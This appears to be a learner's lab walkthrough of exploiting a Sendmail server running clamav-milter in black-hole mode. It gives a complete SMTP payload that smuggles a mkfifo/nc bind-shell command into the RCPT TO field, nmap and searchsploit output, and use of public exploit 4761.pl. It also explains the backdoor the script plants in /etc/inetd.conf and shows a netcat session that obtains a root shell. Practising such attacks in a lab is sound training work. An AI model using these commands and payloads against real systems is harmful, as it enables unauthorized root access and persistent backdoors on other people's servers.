This lab demonstrates the exploitation of a remote code execution vulnerability in 
Sendmail configured with clamav-milter in black-hole mode. Learners will use a public 
exploit to open a bind shell on the target server, granting root access. 
This exercise focuses on service enumeration, exploitation of vulnerable configurations, 
and post-exploitation techniques.



Example payload 
HELO attacker.com
MAIL FROM: <test@attacker.com>
RCPT TO: <"|/usr/bin/mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -lp 1337 >/tmp/f">
DATA
.
QUIT

sudo nmap 

found : 25/tcp    open  smtp        Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.45.232], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info

searchsploit clamav milter
--------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                         |  Path
--------------------------------------------------------------------------------------- ---------------------------------
ClamAV Milter - Blackhole-Mode Remote Code Execution (Metasploit)                      | linux/remote/16924.rb
ClamAV Milter 0.92.2 - Blackhole-Mode (Sendmail) Code Execution (Metasploit)           | multiple/remote/9913.rb
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution                        | multiple/remote/4761.pl
--------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results


searchsploit -m 4761.pl # copy the .pl file to current directory

review the .pl code, 
This seems to be a Perl code that I should run on the SMTP. The idea is to modify the
configuration file /etc/init.d/inetd to open a backdoor port so anyone that connects to this
port is given a root shell.
payload "31337 stream tcp nowait root /bin/sh -i" inject to end of /etc/inetd.conf . so when cmd /etc/init.d/inetd restart . 
it will activate port 31337 and whoever connect to this port will get a root reverse shell.
then run perl 4761.pl <target_ip>

nc -nv <target_ip> <port> # port number based on .pl script
$ nc -nv 192.168.108.42 31337
(UNKNOWN) [192.168.108.42] 31337 (?) open
id
uid=0(root) gid=0(root) groups=0(root)
get the reverse shell with root privilege

#################################################################
cat /etc/inetd.conf 
...
#:OTHER: Other services
#<off># netbios-ssn     stream  tcp     nowait  root    /usr/sbin/tcpd  /usr/sbin/smbd
31337 stream tcp nowait root /bin/sh -i
...


